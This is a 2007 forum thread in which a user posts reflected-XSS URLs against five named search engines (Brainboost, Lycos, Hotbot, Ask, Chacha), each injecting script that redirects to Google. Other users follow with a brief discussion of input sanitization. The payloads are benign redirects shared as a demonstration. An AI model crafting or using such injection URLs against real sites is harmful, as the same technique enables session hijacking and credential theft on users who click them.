Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1) Pages that link to <a href="https://ozoneasylum.com/backlink?for=29278" title="Pages that link to Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1)" rel="nofollow" >Topic: Google taking over other search engines! (aka fun with XSS) <span class="small">(Page 1 of 1)</span>\

 
wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted posted 06-12-2007 17:11

Brainboost:
http://www.brainboost.com/search.asp?Q=%22%3C/title%3E%3Cscript%3Edocument.location='http://www.google.com'</script>
Lycos:
http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E&x=31&y=11
Hotbot:
http://www.hotbot.com/?nil_suggest=btn&ps=&loc=searchbox&tab=web&mode=search&currProv=ask&query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E
Ask:
http://uk.ask.com/web?q=a&search=search&dm=all&qsrc=0&o=312&l=dir&jss=%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E
Chacha:
http://search.chacha.com/search/query?query=%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com

all googlicised!

Wrayal

Tyberius Prime
Maniac (V) Mad Scientist with Finglongers

From: Germany
Insane since: Sep 2001

posted posted 06-13-2007 00:12

br... you'd think the at sanitize their input somewhat.

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted posted 06-13-2007 01:10

why would they ? user input is always clean and well intended.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted posted 06-13-2007 01:12

Poi: Seriously? I agree XSS looks harmless at first, but what (say) if you found a similar flaw in the search function for gmail.google.com and formed a carefully crafted link there? These are only fun but...meh...

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted posted 06-13-2007 01:42

No. I was kidding. Of course input, any input, MUST be sanitized.

At work, people get slammed whenever they don't sanitize user or 3rd party input. Seriously. And our QA people can come up with really sneaky ways to inject script and have us fix our code.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted posted 06-13-2007 01:45

Oh hehe, ok. Sorry, I misread it as serious. I was sad to find out that the only one that had taken any effort (ask) was already in MOSEB =(



Post Reply
 
Your User Name:
Your Password:
Login Options:
 
Your Text:
Loading...
Options:


« BackwardsOnwards »

Show Forum Drop Down Menu